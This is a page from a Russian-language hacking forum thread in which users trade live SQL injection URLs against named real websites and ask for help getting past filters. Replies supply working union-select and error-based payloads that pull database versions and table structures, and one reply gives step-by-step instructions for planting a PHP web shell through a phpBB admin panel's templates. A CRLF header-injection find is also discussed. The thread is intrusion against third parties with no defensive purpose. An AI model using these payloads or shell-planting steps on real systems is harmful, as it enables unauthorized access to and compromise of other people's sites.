Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    lightangel

    it's not vuln

    use logical expressions to check it, instead of "-"
     
    _________________________
    #18561 Konqi, 9 Dec 2011
    Last edited: 9 Dec 2011
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    406
    Reputations:
    196
    нет.
     
  3. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Sorry for bringing back WAF topic.

    I have read all articles on SQL Injection in antichat so don't think should be given again.

    Code:
    http://www.worldstyling.com/web/product_detail.php?id=-95/*!UnIoN+SeLeCt*/1,2,3,4,5+--+
    Once I want to get union it tells Not Found, Not Found.
     
  4. zenon3

    zenon3 New Member

    Joined:
    22 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    www.allaboutjazz.com/php/article_archive.php'

    как раскрутить? Использование пробелов в корне запрещено

    www.allaboutjazz.com/php/article_archive.php'or(ExtractValue(1,concat(0x3a,version())))='1
    пишет FUNCTION allaboutjazz.ExtractValue does not exist

    какие еще могут быть варианты?
     
  5. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    http://www.worldstyling.com/web/product_detail.php?id=95/*!UnIoN!*/+/!*SeLeCt*!/1,2,3,4,5+--+
    tried all WAF solution, nothing comes.

    And also, checked souurce.
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://www.worldstyling.com/web/product_detail.php?id=95'+or+1+group+by+concat_ws(0x3a,version(),rand(0)|0)+having+min(0)--+
     
    _________________________
  7. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    Народ, что это ?

    Code:
    http://foto4u.info/go.php?link=video&s=100&url=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    acunetix
     
  9. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0
    :) Что с этим можно сделать ?
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    SomeCustomInjectedHeader

    переведи и подумай...
     
  11. XAOCX

    XAOCX Banned

    Joined:
    19 Dec 2008
    Messages:
    23
    Likes Received:
    4
    Reputations:
    0

    Шелл получится залить ?
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    PHP:
    http://www.gospelmp3.ru/artists/?id=-39%27+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x7061676573--+
    Почему не выводит колонки?? (вывод дполжен быть в титле)
     
  13. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Похоже на то что where фильтруется, можешь попорбывать крутить так:
    Code:
    http://www.gospelmp3.ru/news/?id=-115+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,table_name,column_name%29,9,10,11,12,13,14,15+from+information_schema.columns+limit+1,1--&n_action=read
    
    перебирая лимит пока не найдешь то что нужно, руками конечно муторно но думаю накидать скриптик который сдампит структуру не проблема.
     
    1 person likes this.
  14. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    есть досьуп к админке на движке phpbb, могу править шаблоны, как залить туда шелл?? какой код вставить?
     
  15. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    134
    Likes Received:
    26
    Reputations:
    5
    Откройте Администраторский раздел => Общие => Безопасность
    Разрешите php в шаблонах и сохраните настройки
    Откройте Администраторский раздел => Стили => Шаблоны
    Напортив активного шаблона нажмите "Изменить"
    Выберите файл шаблона, в который хотите вставить php, например "overall_footer.html"
    В нужное место вставьте <?php ..... ?>
     
    2 people like this.
  16. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    как то криво все встает, и допустим я закачаю шелл потом на форум и гдде он будет лежать?
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    правь шаблон фака..на форуме он будет forum.com/faq.php
     
    1 person likes this.
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    Code:
    http://eafangames.com/live_score_tennis.php/flash_games_online.php
    ?channel=76'%00 order by 1--
    в чём проблемма не могу понять!подскажите!
     
  19. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    253
    Likes Received:
    46
    Reputations:
    21
    Я правил его, тоже ничего не получается(( дайте пжл мне пшп код в пм)
     
  20. trololoman96

    trololoman96 Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    123
    Likes Received:
    34
    Reputations:
    55
    Code:
    http://eafangames.com/live_score_tennis.php/flash_games_online.php?channel=76'%29+union+select+@@version--%201#inscore_ifheight_xdc_500
    
    Done!
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.